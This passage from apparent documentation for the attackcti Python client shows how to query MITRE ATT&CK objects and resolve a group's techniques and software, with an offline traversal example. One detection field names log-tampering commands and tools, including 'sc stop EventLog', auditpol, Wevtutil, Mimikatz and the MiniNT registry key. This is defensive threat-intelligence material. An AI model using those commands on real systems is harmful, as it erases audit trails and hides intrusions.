Retrieved September 14, 2021.', url='https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team'], x_mitre_data_sources=['Process: Process Creation', 'Script: Script Execution', 'Windows Registry: Windows Registry Key Creation', 'Application Log: Application Log Content', 'Sensor Health: Host Status', 'Command: Command Execution'], x_mitre_defense_bypassed=['Log analysis'], x_mitre_detection='Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \n\nIn Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['Administrator'], x_mitre_platforms=['Windows'], x_mitre_version='1.1')
Get Techniques Used by Group (TAXII)#
get_groups() returns every Group STIX object (intrusion-set) available across all the matrices. To retrieve the techniques a specific group uses, pass one of those objects to get_techniques_used_by_group(), which resolves the group's "uses" relationships to attack-pattern objects. Group names are case sensitive when you look a group up by name.
groups = lift.get_groups()
one_group = groups[0]
group_techniques = lift.get_techniques_used_by_group(one_group)
group_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-03-31T14:26:00.848Z', modified='2021-04-12T18:22:05.737Z', name='Container and Resource Discovery', description='Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1613', external_id='T1613'), ExternalReference(source_name='Docker API', description='Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.', url='https://docs.docker.com/engine/api/v1.41/'), ExternalReference(source_name='Kubernetes API', description='The Kubernetes Authors. (n.d.). The Kubernetes API. 
Retrieved March 29, 2021.', url='https://kubernetes.io/docs/concepts/overview/kubernetes-api/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Vishwas Manral, McAfee', 'Center for Threat-Informed Defense (CTID)', 'Yossi Weizman, Azure Defender Research Team'], x_mitre_data_sources=['Cluster: Cluster Metadata', 'Container: Container Enumeration', 'Container: Container Metadata', 'Pod: Pod Enumeration', 'Pod: Pod Metadata', 'Application Log: Application Log Content'], x_mitre_detection='Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.\n\nMonitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. ', x_mitre_is_subtechnique=False, x_mitre_permissions_required=['User'], x_mitre_platforms=['Containers'], x_mitre_version='1.0')
Get Software Used by Group (TAXII)#
You can retrieve every piece of software (malware or tool STIX object) mapped to a specific Group STIX object through a "uses" relationship.
groups = lift.get_groups()
one_group = groups[0]
group_software = lift.get_software_used_by_group(one_group)
group_software[0]
Malware(type='malware', id='malware--40a1b8ec-7295-416c-a6b1-68181d86f120', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-04-07T18:07:47.604Z', modified='2021-10-16T01:49:39.189Z', name='Hildegard', description='[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)', revoked=False, labels=['malware'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/software/S0601', external_id='S0601'), ExternalReference(source_name='Unit 42 Hildegard Malware', description='Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.', url='https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_aliases=['Hildegard'], x_mitre_contributors=['Center for Threat-Informed Defense (CTID)'], x_mitre_platforms=['Linux', 'Containers', 'IaaS'], x_mitre_version='1.1')
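The two lookups above both work the same way underneath: a group (intrusion-set) is linked to techniques (attack-pattern) and software (malware, tool) by STIX relationship objects whose relationship_type is "uses". The example below is added here and is not attackcti's own code; it reimplements that traversal over a small, constructed bundle (the object IDs, and the use of "Withdrawn Technique", "Example Tool" and the T1496 link are hypothetical) so it runs offline. It also shows two things the helper calls do not make obvious: ATT&CK keeps revoked and deprecated objects in the collection, so a consumer should filter them, and a group may reach a technique only indirectly, through software it uses (group -> software -> technique).

```python
"""Resolve techniques and software used by a group from STIX 'uses' relationships.

Added example, not part of the attackcti client. The bundle is constructed
sample data shaped like ATT&CK STIX 2 objects; the IDs are hypothetical.
"""
from collections import defaultdict

# Constructed sample bundle (hypothetical IDs, ATT&CK-shaped objects).
BUNDLE = [
    {"type": "intrusion-set", "id": "intrusion-set--g1", "name": "Example Group",
     "external_references": [{"source_name": "mitre-attack", "external_id": "G9999"}]},
    {"type": "attack-pattern", "id": "attack-pattern--t1", "name": "Container and Resource Discovery",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1613"}]},
    {"type": "attack-pattern", "id": "attack-pattern--t2", "name": "Withdrawn Technique",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T0000"}],
     "revoked": True},
    {"type": "attack-pattern", "id": "attack-pattern--t3", "name": "Resource Hijacking",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1496"}]},
    {"type": "malware", "id": "malware--m1", "name": "Hildegard",
     "external_references": [{"source_name": "mitre-attack", "external_id": "S0601"}]},
    {"type": "tool", "id": "tool--x1", "name": "Example Tool",
     "external_references": [{"source_name": "mitre-attack", "external_id": "S9999"}],
     "x_mitre_deprecated": True},
    # 'uses' edges: group -> technique, group -> software, software -> technique
    {"type": "relationship", "id": "relationship--r1", "relationship_type": "uses",
     "source_ref": "intrusion-set--g1", "target_ref": "attack-pattern--t1"},
    {"type": "relationship", "id": "relationship--r2", "relationship_type": "uses",
     "source_ref": "intrusion-set--g1", "target_ref": "attack-pattern--t2"},
    {"type": "relationship", "id": "relationship--r3", "relationship_type": "uses",
     "source_ref": "intrusion-set--g1", "target_ref": "malware--m1"},
    {"type": "relationship", "id": "relationship--r4", "relationship_type": "uses",
     "source_ref": "intrusion-set--g1", "target_ref": "tool--x1"},
    {"type": "relationship", "id": "relationship--r5", "relationship_type": "uses",
     "source_ref": "malware--m1", "target_ref": "attack-pattern--t3"},
    # a non-'uses' relationship that the traversal must ignore
    {"type": "relationship", "id": "relationship--r6", "relationship_type": "mitigates",
     "source_ref": "course-of-action--c1", "target_ref": "attack-pattern--t1"},
]

TECHNIQUE_TYPES = ("attack-pattern",)
SOFTWARE_TYPES = ("malware", "tool")


def attack_id(obj):
    """Return the ATT&CK ID (T1613, S0601, G....) from the mitre-attack external reference."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def is_active(obj):
    """ATT&CK keeps revoked/deprecated objects in the collection; skip them by default."""
    return not obj.get("revoked", False) and not obj.get("x_mitre_deprecated", False)


def get_group(bundle, name):
    """Look up a group by exact (case-sensitive) name, mirroring the client's behaviour."""
    return next(o for o in bundle if o["type"] == "intrusion-set" and o["name"] == name)


def index_bundle(bundle):
    """Build an id -> object map and a source_ref -> [target_ref] map of 'uses' edges."""
    by_id = {o["id"]: o for o in bundle}
    uses = defaultdict(list)
    for o in bundle:
        if o["type"] == "relationship" and o.get("relationship_type") == "uses":
            uses[o["source_ref"]].append(o["target_ref"])
    return by_id, uses


def used_by(bundle, source, target_types, include_inactive=False):
    """Objects of the given STIX types that `source` uses directly."""
    by_id, uses = index_bundle(bundle)
    out = []
    for target_ref in uses.get(source["id"], []):
        target = by_id.get(target_ref)
        if target is None or target["type"] not in target_types:
            continue  # dangling reference or a type we are not asking for
        if not include_inactive and not is_active(target):
            continue
        out.append(target)
    return out


def techniques_used_by_group(bundle, group, include_inactive=False):
    return used_by(bundle, group, TECHNIQUE_TYPES, include_inactive)


def software_used_by_group(bundle, group, include_inactive=False):
    return used_by(bundle, group, SOFTWARE_TYPES, include_inactive)


def techniques_via_software(bundle, group):
    """Techniques reached only through the group's software (group -> software -> technique)."""
    seen = {}
    for sw in software_used_by_group(bundle, group):
        for tech in used_by(bundle, sw, TECHNIQUE_TYPES):
            seen[tech["id"]] = tech
    return list(seen.values())


def attack_ids(objs):
    return sorted(attack_id(o) for o in objs)


if __name__ == "__main__":
    g = get_group(BUNDLE, "Example Group")
    print("direct techniques:", attack_ids(techniques_used_by_group(BUNDLE, g)))
    print("software:", attack_ids(software_used_by_group(BUNDLE, g)))
    print("techniques via software:", attack_ids(techniques_via_software(BUNDLE, g)))
```

With the sample bundle the direct technique list is only T1613 (the revoked T0000 is dropped unless include_inactive=True), the software list is S0601 (the deprecated tool is dropped the same way), and T1496 appears only via Hildegard. If you build detection coverage from a group's technique list, decide explicitly whether the indirect, software-inherited techniques belong in it.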